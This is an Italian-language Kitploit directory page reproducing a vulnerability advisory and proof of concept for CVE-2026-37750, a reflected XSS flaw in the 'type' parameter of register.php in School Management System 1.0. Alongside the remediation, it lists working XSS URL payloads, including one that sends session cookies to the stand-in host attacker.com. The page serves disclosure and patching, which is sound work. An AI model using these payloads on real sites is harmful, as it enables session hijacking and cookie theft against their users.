Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-37750 — # Proof-of-concept di XSS riflesso per School Management System 1.0 Dimostrazione dell'esecuzione non autenticata di JavaScript tramite il parametro `type` in `register.php`, con analisi dell'impatto e indicazioni di rimedio. | Kitploit
Strumenti/GitHubGitHub/menevarad007/cve-2026-37750
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e Formazione
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

# Proof-of-concept di XSS riflesso per School Management System 1.0 Dimostrazione dell'esecuzione non autenticata di JavaScript tramite il parametro `type` in `register.php`, con analisi dell'impatto e indicazioni di rimedio.

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-37750 — School Management System 1.0 - XSS Riflesso

Dettagli

CampoInformazioni
ID CVECVE-2026-37750
TipoCross-Site Scripting (XSS) Riflesso
GravitàMedia (CVSSv3: 6.1)
Venditoremahmoudai1
ProdottoSchool Management System
Versione1.0
ScopritoreVarad AP Mene
Data2026-04-16
CWECWE-79

Descrizione

Una vulnerabilità di Cross-Site Scripting (XSS) riflesso in School Management System 1.0 di mahmoudai1 consente a utenti remoti non autenticati di eseguire JavaScript arbitrario nei browser delle vittime tramite il parametro type non sanificato in register.php. Il parametro viene riflesso senza escaping all'interno di un tag h1 alla riga 22 e all'interno di un attributo action di un form alla riga 26. Non è richiesta alcuna autenticazione per sfruttare questa vulnerabilità.

ID CVE: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Media (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Descrizione del Prodotto

School Management System 1.0 è un'applicazione web PHP/MySQL di mahmoudai1 su GitHub utilizzata per gestire studenti, insegnanti e genitori nelle scuole.

URL del venditore: https://github.com/mahmoudai1/school-management-system


File Vulnerabile

register.php — Modulo di registrazione (nessuna autenticazione richiesta)


Codice Vulnerabile

Riga 22: echo ucfirst($_REQUEST['type'])

Riga 26: echo $_REQUEST['type']

Nessun htmlspecialchars() utilizzato — l'input utente grezzo viene riflesso direttamente nell'HTML.


Prova di Concetto

Prerequisiti:

  • Nessuna autenticazione richiesta
  • Il target deve eseguire School Management System 1.0

Passo 1 — Aprire il browser e visitare questo URL: http://target/register.php?type=script-alert-document.cookie-/script

Passo 2 — JavaScript viene eseguito nel browser Risultato: viene visualizzata una finestra di avviso che mostra i cookie di sessione.

Passo 3 — Payload per il furto di cookie: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Passo 4 — Payload per l'iniezione nell'attributo action del form: http://target/register.php?type="-script-alert(1)-/script

Due punti di iniezione confermati:

Punto di Iniezione 1 — All'interno del tag h1 (riga 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Output:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Punto di Iniezione 2 — All'interno dell'attributo action del form (riga 26):

root@kitploit:~
echo $_REQUEST['type']

Output:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Impatto

  • Dirottamento di sessione tramite furto di cookie
  • Phishing — iniezione di moduli di login falsi
  • Distribuzione di malware tramite reindirizzamenti
  • Nessuna autenticazione richiesta

Rimedio

Correzione riga 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Correzione riga 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Riferimenti

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Scopritore

Varad AP Mene Email: [email protected] GitHub: https://github.com/menevarad007

Scarica lo strumento